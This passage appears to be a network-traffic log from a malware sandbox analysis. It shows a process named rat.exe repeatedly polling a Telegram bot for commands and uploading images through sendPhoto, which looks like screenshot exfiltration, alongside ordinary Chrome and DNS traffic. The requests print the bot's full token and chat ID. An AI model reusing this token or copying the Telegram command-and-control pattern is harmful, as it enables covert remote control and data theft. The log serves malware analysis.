                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:22 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506634
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506634 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:23 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506635
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506635 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:24 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506636
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506636 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:25 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506637
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506637 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:26 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506638
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506638 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:27 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506639
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506639 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:28 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506640
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506640 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:29 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506641
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506641 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:30 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506642
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506642 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:31 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506643
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506643 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:32 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506644
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506644 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:33 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-us
                                      DNS
                                      220.167.154.149.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      220.167.154.149.in-addr.arpa
                                      IN PTR
                                      Response
                                    • flag-us
                                      DNS
                                      149.220.183.52.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      149.220.183.52.in-addr.arpa
                                      IN PTR
                                      Response
                                    • flag-nl
                                      POST
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendPhoto?chat_id=-4791200354
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      POST /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendPhoto?chat_id=-4791200354 HTTP/1.1
                                      Content-Type: multipart/form-data; boundary="bcd07d7e-d6ae-4fed-a1f2-cd30677b9466"
                                      Host: api.telegram.org
                                      Content-Length: 442361
                                      Expect: 100-continue
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:03 GMT
                                      Content-Type: application/json
                                      Content-Length: 951
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-us
                                      DNS
                                      154.239.44.20.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      154.239.44.20.in-addr.arpa
                                      IN PTR
                                      Response
                                    • flag-us
                                      DNS
                                      www.google.com
                                      chrome.exe
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      www.google.com
                                      IN A
                                      Response
                                      www.google.com
                                      IN A
                                      142.250.187.196
                                    • flag-gb
                                      GET
                                      https://www.google.com/async/ddljson?async=ntp:2
                                      chrome.exe
                                      Remote address:
                                      142.250.187.196:443
                                      Request
                                      GET /async/ddljson?async=ntp:2 HTTP/2.0
                                      host: www.google.com
                                      sec-fetch-site: none
                                      sec-fetch-mode: no-cors
                                      sec-fetch-dest: empty
                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                      accept-encoding: gzip, deflate, br, zstd
                                      accept-language: en-US,en;q=0.9
                                    • flag-gb
                                      GET
                                      https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                      chrome.exe
                                      Remote address:
                                      142.250.187.196:443
                                      Request
                                      GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/2.0
                                      host: www.google.com
                                      x-client-data: CO/cygE=
                                      sec-fetch-site: cross-site
                                      sec-fetch-mode: no-cors
                                      sec-fetch-dest: empty
                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                      accept-encoding: gzip, deflate, br, zstd
                                      accept-language: en-US,en;q=0.9
                                    • flag-gb
                                      GET
                                      https://www.google.com/async/newtab_promos
                                      chrome.exe
                                      Remote address:
                                      142.250.187.196:443
                                      Request
                                      GET /async/newtab_promos HTTP/2.0
                                      host: www.google.com
                                      sec-fetch-site: cross-site
                                      sec-fetch-mode: no-cors
                                      sec-fetch-dest: empty
                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                      accept-encoding: gzip, deflate, br, zstd
                                      accept-language: en-US,en;q=0.9
                                    • flag-gb
                                      GET
                                      https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS117BTGIiG-7sGIjCI2qRX3K85NHGD_h1oGx8vmuIc11KcfmHfKLBQgSl9f3L8LvezMRz8XYrk8cPCiagyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                      chrome.exe
                                      Remote address:
                                      142.250.187.196:443
                                      Request
                                      GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS117BTGIiG-7sGIjCI2qRX3K85NHGD_h1oGx8vmuIc11KcfmHfKLBQgSl9f3L8LvezMRz8XYrk8cPCiagyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/2.0
                                      host: www.google.com
                                      sec-fetch-site: cross-site
                                      sec-fetch-mode: no-cors
                                      sec-fetch-dest: empty
                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                      accept-encoding: gzip, deflate, br, zstd
                                      accept-language: en-US,en;q=0.9
                                    • flag-gb
                                      GET
                                      https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGIiG-7sGIjDs9k9B6N6dO-qe16bxlqE_8wYFppdPyDfpy0X1573l7daqnUEbbbKLrj8vUyukk2oyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                      chrome.exe
                                      Remote address:
                                      142.250.187.196:443
                                      Request
                                      GET /sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGIiG-7sGIjDs9k9B6N6dO-qe16bxlqE_8wYFppdPyDfpy0X1573l7daqnUEbbbKLrj8vUyukk2oyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/2.0
                                      host: www.google.com
                                      sec-fetch-site: none
                                      sec-fetch-mode: no-cors
                                      sec-fetch-dest: empty
                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                      accept-encoding: gzip, deflate, br, zstd
                                      accept-language: en-US,en;q=0.9
                                    • flag-us
                                      DNS
                                      227.16.217.172.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      227.16.217.172.in-addr.arpa
                                      IN PTR
                                      Response
                                      227.16.217.172.in-addr.arpa
                                      IN PTR
                                      lhr48s28-in-f31e100net
                                      227.16.217.172.in-addr.arpa
                                      IN PTR
                                      mad08s04-in-f3�H
                                    • flag-us
                                      DNS
                                      53.210.109.20.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      53.210.109.20.in-addr.arpa
                                      IN PTR
                                      Response
                                    • flag-us
                                      DNS
                                      74.204.58.216.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      74.204.58.216.in-addr.arpa
                                      IN PTR
                                      Response
                                      74.204.58.216.in-addr.arpa
                                      IN PTR
                                      lhr25s13-in-f741e100net
                                      74.204.58.216.in-addr.arpa
                                      IN PTR
                                      lhr25s13-in-f10�H
                                      74.204.58.216.in-addr.arpa
                                      IN PTR
                                      lhr48s49-in-f10�H
                                    • flag-us
                                      DNS
                                      196.187.250.142.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      196.187.250.142.in-addr.arpa
                                      IN PTR
                                      Response
                                      196.187.250.142.in-addr.arpa
                                      IN PTR
                                      lhr25s33-in-f41e100net
                                    • flag-us
                                      DNS
                                      15.164.165.52.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      15.164.165.52.in-addr.arpa
                                      IN PTR
                                      Response
                                    • flag-us
                                      DNS
                                      clients2.google.com
                                      chrome.exe
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      clients2.google.com
                                      IN A
                                      Response
                                      clients2.google.com
                                      IN CNAME
                                      clients.l.google.com
                                      clients.l.google.com
                                      IN A
                                      142.250.187.238
                                    • flag-gb
                                      GET
                                      https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.82.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D93%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D93%2526e%253D1
                                      chrome.exe
                                      Remote address:
                                      142.250.187.238:443
                                      Request
                                      GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.82.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D93%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D93%2526e%253D1 HTTP/2.0
                                      host: clients2.google.com
                                      sec-fetch-site: none
                                      sec-fetch-mode: no-cors
                                      sec-fetch-dest: empty
                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                      accept-encoding: gzip, deflate, br, zstd
                                      accept-language: en-US,en;q=0.9
                                      cookie: __Secure-ENID=22.SE=lFltdGa6dnfW9d4asp7wAx85mf8iX-qG-UfHL7Prdgq32TsAGDhgqLSfQ9Fb9L2RUgbCohQXanQPpTciDv8ZFanQyIvuEAhmmWEDkGb6qqA5ZpVT7nxNCogav0KWC-kEjEKcTHj8a4YeTlu-JUjhgxBrf_286JNnMvogAhQ7W3hcIablhN0w8YCMa6I9atmLUW0
                                    • flag-us
                                      DNS
                                      238.187.250.142.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      238.187.250.142.in-addr.arpa
                                      IN PTR
                                      Response
                                      238.187.250.142.in-addr.arpa
                                      IN PTR
                                      lhr25s34-in-f141e100net
                                    • flag-us
                                      DNS
                                      clients2.googleusercontent.com
                                      chrome.exe
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      clients2.googleusercontent.com
                                      IN A
                                      Response
                                      clients2.googleusercontent.com
                                      IN CNAME
                                      googlehosted.l.googleusercontent.com
                                      googlehosted.l.googleusercontent.com
                                      IN A
                                      142.250.200.33
                                    • flag-gb
                                      GET
                                      https://clients2.googleusercontent.com/crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx
                                      chrome.exe
                                      Remote address:
                                      142.250.200.33:443
                                      Request
                                      GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/2.0
                                      host: clients2.googleusercontent.com
                                      sec-fetch-site: none
                                      sec-fetch-mode: no-cors
                                      sec-fetch-dest: empty
                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                      accept-encoding: gzip, deflate, br, zstd
                                      accept-language: en-US,en;q=0.9
                                    • flag-us
                                      DNS
                                      33.200.250.142.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      33.200.250.142.in-addr.arpa
                                      IN PTR
                                      Response
                                      33.200.250.142.in-addr.arpa
                                      IN PTR
                                      lhr48s30-in-f11e100net
                                    • flag-us
                                      DNS
                                      33.200.250.142.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      33.200.250.142.in-addr.arpa
                                      IN PTR
                                    • flag-us
                                      DNS
                                      172.214.232.199.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      172.214.232.199.in-addr.arpa
                                      IN PTR
                                      Response
                                    • flag-us
                                      DNS
                                      172.214.232.199.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      172.214.232.199.in-addr.arpa
                                      IN PTR
                                    • flag-us
                                      DNS
                                      172.214.232.199.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      172.214.232.199.in-addr.arpa
                                      IN PTR
                                    • flag-nl
                                      POST
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendPhoto?chat_id=-4791200354
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      POST /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendPhoto?chat_id=-4791200354 HTTP/1.1
                                      Content-Type: multipart/form-data; boundary="01faddf4-a26d-484d-b0a7-ff51fe38ef4e"
                                      Host: api.telegram.org
                                      Content-Length: 55613
                                      Expect: 100-continue
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:19 GMT
                                      Content-Type: application/json
                                      Content-Length: 948
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      POST
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendPhoto?chat_id=-4791200354
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      POST /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendPhoto?chat_id=-4791200354 HTTP/1.1
                                      Content-Type: multipart/form-data; boundary="fdb52664-f3af-42f7-b956-a83772747dd6"
                                      Host: api.telegram.org
                                      Content-Length: 55613
                                      Expect: 100-continue
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:38 GMT
                                      Content-Type: application/json
                                      Content-Length: 948
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-us
                                      DNS
                                      180.129.81.91.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      180.129.81.91.in-addr.arpa
                                      IN PTR
                                      Response
                                    • flag-us
                                      DNS
                                      13.227.111.52.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      13.227.111.52.in-addr.arpa
                                      IN PTR
                                      Response
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506645
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506645 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:35 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506646
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506646 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:36 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506647
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506647 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:37 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506648
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506648 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:38 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506649
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506649 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:26:39 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
